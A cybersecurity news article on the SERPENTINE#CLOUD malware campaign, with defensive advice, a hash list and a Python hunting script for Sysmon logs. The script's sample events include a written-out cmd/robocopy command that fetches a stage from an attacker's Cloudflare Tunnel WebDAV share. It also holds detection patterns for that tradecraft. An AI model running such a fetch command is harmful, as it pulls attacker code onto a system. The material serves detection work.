Sunday, January 18, 2026

Cybercriminals Exploit Cloudflare Tunnels to Deploy Covert Python Malware

In a recent surge of cyberattacks, threat actors are abusing Cloudflare’s legitimate tunneling service to deliver stealthy malware, according to a detailed report from Securonix threat researchers.

The campaign, dubbed SERPENTINE#CLOUD, employs a multi-stage infection chain initiated by malicious shortcut files (.lnk) masquerading as harmless PDF documents.

Designed to evade detection by both users and security tools, this campaign targets victims in Western countries, especially the United States, the United Kingdom, and Germany, but has also been observed in other regions across Europe and Asia.

Screenshots of hosted content by the attacker from within a browser

The attack begins with phishing emails featuring supposed invoices or payment confirmations. Recipients are prompted to open ZIP files containing .lnk files that appear to be PDFs, a social engineering ruse aided by custom icons and a Windows quirk that hides the .lnk extension even when file extension display is enabled.

Once executed, the .lnk file leverages legitimate Windows utilities like cmd.exe and robocopy to download and execute the next stage payload from a remote WebDAV share hosted on a Cloudflare Tunnel subdomain, such as “flour-riding-merit-refers.trycloudflare[.]com.”

Cloudflare Tunnels provide a crucial layer of obfuscation and anonymity for attackers, allowing them to expose malicious payloads through temporary subdomains without the need to register domains or rent dedicated servers.

This trusted infrastructure makes it less likely for network monitoring tools to flag suspicious activity, as traffic blends in with legitimate Cloudflare CDN communications.

The use of HTTPS and WebDAV over SSL further complicates detection by encrypting payload delivery and evading deep packet inspection tools.

Multi-Stage Scripting and Obfuscation Techniques Shroud Malicious Intent

Following initial access, the attack progresses through several carefully orchestrated stages.

After the .lnk file fetches a malicious Windows Script File (WSF), a lightweight VBScript-based loader executes, retrieving and launching an obfuscated batch file from another Cloudflare subdomain.

The batch script employs complex encoding and variable substitution techniques to mask its true purpose, making static analysis challenging.

The main payload delivery script, often named something like “kiki.bat,” performs a range of evasive and persistence actions.

It deploys a decoy PDF to distract users, checks for antivirus software, and downloads compressed Python payloads into the victim’s Contacts or Print directories.

The script establishes persistence by placing VBS and additional batch files in the Windows startup folder, ensuring the malware re-executes after system reboots.

Python Shellcode Loaders and In-Memory Exploitation Mark Final Stage

The campaign’s most sophisticated phase utilizes Python-based shellcode loaders. These scripts, obfuscated using techniques such as alphanumeric shift encoding, bytewise shifting with randomized keys, and custom newline replacement, are designed to decrypt and execute RC4-encrypted shellcode entirely in memory.

One notable loader, “run.py,” implements Early Bird APC injection: it launches an innocent process (e.g., notepad.exe) in a suspended state, injects decrypted shellcode, and resumes execution, all while maintaining stealth and evading detection by endpoint protection systems.

Ultimately, the shellcode loads a PE (Portable Executable) payload packed with Donut, a framework for executing .NET assemblies entirely in memory without requiring disk access.

This approach not only complicates forensic analysis but also enables the threat actors to establish persistent command-and-control (C2) channels for credential theft, data exfiltration, and lateral movement.

Defensive Recommendations

Experts strongly advise organizations to bolster their defenses by enabling file extension visibility on Windows endpoints, monitoring for script activity in unusual directories (such as Contacts), and scrutinizing Python processes launched from atypical locations.

Robust endpoint logging and solutions like Sysmon can help detect multistage scripting attacks and anomalous process trees. Securonix has also released specific hunting queries to help organizations identify indicators of compromise related to this campaign.
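As an added illustration of these recommendations (example code written for this page, not Securonix’s published hunting queries), the script below runs four hunting rules over a handful of Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records: a script host reaching a trycloudflare.com host or a WebDAV UNC path, a Python interpreter running from the Contacts or Print folder, a document-named file that is really a .lnk, and a script file written to the Startup folder. The sample events, the user name, and file names such as persist.bat are constructed; the tunnel subdomain, the Contacts/Print directories, and the .lnk-as-PDF ruse come from the report. The masquerade rule generalizes the article’s PDF case to .doc/.docx and .xls/.xlsx as well.

```python
"""Hunting rules for the SERPENTINE#CLOUD tradecraft described in the article,
run over constructed Sysmon-style events (not real telemetry). Event ID 1 is
process creation, Event ID 11 is file creation; field names follow Sysmon."""
import re
from pathlib import PureWindowsPath

# Windows utilities the report names as the download/launch vehicles
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "robocopy.exe"}
# User-profile folders the report says the Python payloads land in
ODD_DIRS = ("\\contacts\\", "\\print\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
SCRIPT_EXT = {".vbs", ".bat", ".cmd", ".wsf"}
# Quick tunnel hostnames look like random-words.trycloudflare.com
TUNNEL_RE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)
# UNC path to a WebDAV share as the Windows redirector spells it
WEBDAV_RE = re.compile(r"\\\\[^\\\s]+\\davwwwroot\\", re.I)
# Document extension followed by the .lnk that Explorer never displays
MASQ_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk$", re.I)


def hunt(events):
    """Return one dict per rule hit: {'rule', 'image', 'detail'}."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:  # process create
            image = ev["Image"]
            cmd = ev.get("CommandLine", "")
            name = PureWindowsPath(image).name.lower()
            where = (image + " " + ev.get("CurrentDirectory", "")).lower()
            if name in SCRIPT_HOSTS and (TUNNEL_RE.search(cmd) or WEBDAV_RE.search(cmd)):
                hits.append({"rule": "tunnel_fetch", "image": image, "detail": cmd})
            if name.startswith("python") and any(d in where for d in ODD_DIRS):
                hits.append({"rule": "python_odd_dir", "image": image, "detail": cmd})
        elif eid == 11:  # file create
            target = ev["TargetFilename"]
            if MASQ_RE.search(target):
                hits.append({"rule": "lnk_masquerade", "image": ev["Image"], "detail": target})
            if STARTUP_DIR in target.lower() and PureWindowsPath(target).suffix.lower() in SCRIPT_EXT:
                hits.append({"rule": "startup_drop", "image": ev["Image"], "detail": target})
    return hits


def rules_fired(events):
    """Sorted list of distinct rule names that fired over the events."""
    return sorted({h["rule"] for h in hunt(events)})


# Constructed sample telemetry: a benign process, the chain from the article, a benign Python run
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe --profile-directory=Default"},
    # ZIP extracted; the "PDF" inside is a shortcut (constructed file name)
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\jdoe\Downloads\wire-confirmation.pdf.lnk"},
    # shortcut target: cmd + robocopy pulling the next stage from a tunnel-hosted WebDAV share (constructed)
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c robocopy \\flour-riding-merit-refers.trycloudflare.com@SSL\DavWWWRoot\ %TEMP% stage.wsf"},
    # persistence: batch file written into the Startup folder (constructed name)
    {"EventID": 11, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persist.bat"},
    # final stage: a Python interpreter dropped under Contacts runs the loader
    {"EventID": 1, "Image": r"C:\Users\jdoe\Contacts\pyt\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "python.exe run.py",
     "CurrentDirectory": r"C:\Users\jdoe\Contacts\pyt"},
    # benign developer Python for contrast
    {"EventID": 1, "Image": r"C:\Python312\python.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "python.exe build.py", "CurrentDirectory": r"C:\src\app"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"[{h['rule']}] {h['image']} :: {h['detail']}")
```

Each rule keys on one observable the report calls out rather than on a hash, so it keeps working when the attacker rotates the tunnel subdomain or re-obfuscates the scripts; the two benign records show the rules staying quiet on a normal browser launch and on a developer’s Python run from a conventional install path.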

This complex, layered attack exemplifies the evolving tactics of cybercriminals, blending social engineering with advanced obfuscation and abuse of legitimate infrastructure for maximum stealth and impact.

Analyzed files/hashes

File Name                                   SHA256
Online-wire-confirmation-receipt846752.zip  193218243C54D7903C65F5E7BE9B865DDB286DA9005C69E6E955E31EC3EFA1A7
Online-wire-confirmation-receipt75857.zip   3B97A79ED920A508B4CD91240D0795713C559C36862C75EC6C9A41B4EC05D279
wire-confirmation-55281762.url              32253D3EA50927D0FD79F5BFDD6EE93C46AA26126CE4360D9915FABD2E5F562F
Emban.zip                                   81C47E749E8A3376294DE8593C2387A0642080303BB17D902BABFF1DE561E743
bab.zip                                     017FD2003F8EAA65FF85131322F5FAEC1E338511788328438020848EDF3DFD8D
                                            22DE5FFC9BFFE49C4713113AC171B95E016ED0F09065BFEE1394A579174E8DD6
                                            E78FF6F51A3FAECF4D20CD5B71B2396B7C2FEC74AF19122B1E1EEE432C13B773
cam.zip                                     100970B2EB83E3A80CB463126845619A05C979D235B07ECA4B1C2027772334EC
                                            63FFC2B66E32111CD5BE311AD499BD15DA5D28EDC05B7F3DA43DFE77F3E2C7F8
                                            F6B403D719D770FFB6CC310E2F97889998224A563A1A629BE5B7F8642B5F00BA
FTSP.zip                                    0484DE293F2C125132CAA585229A8702AF00CB645AA27684C2EE6F9F4F3EDB6F
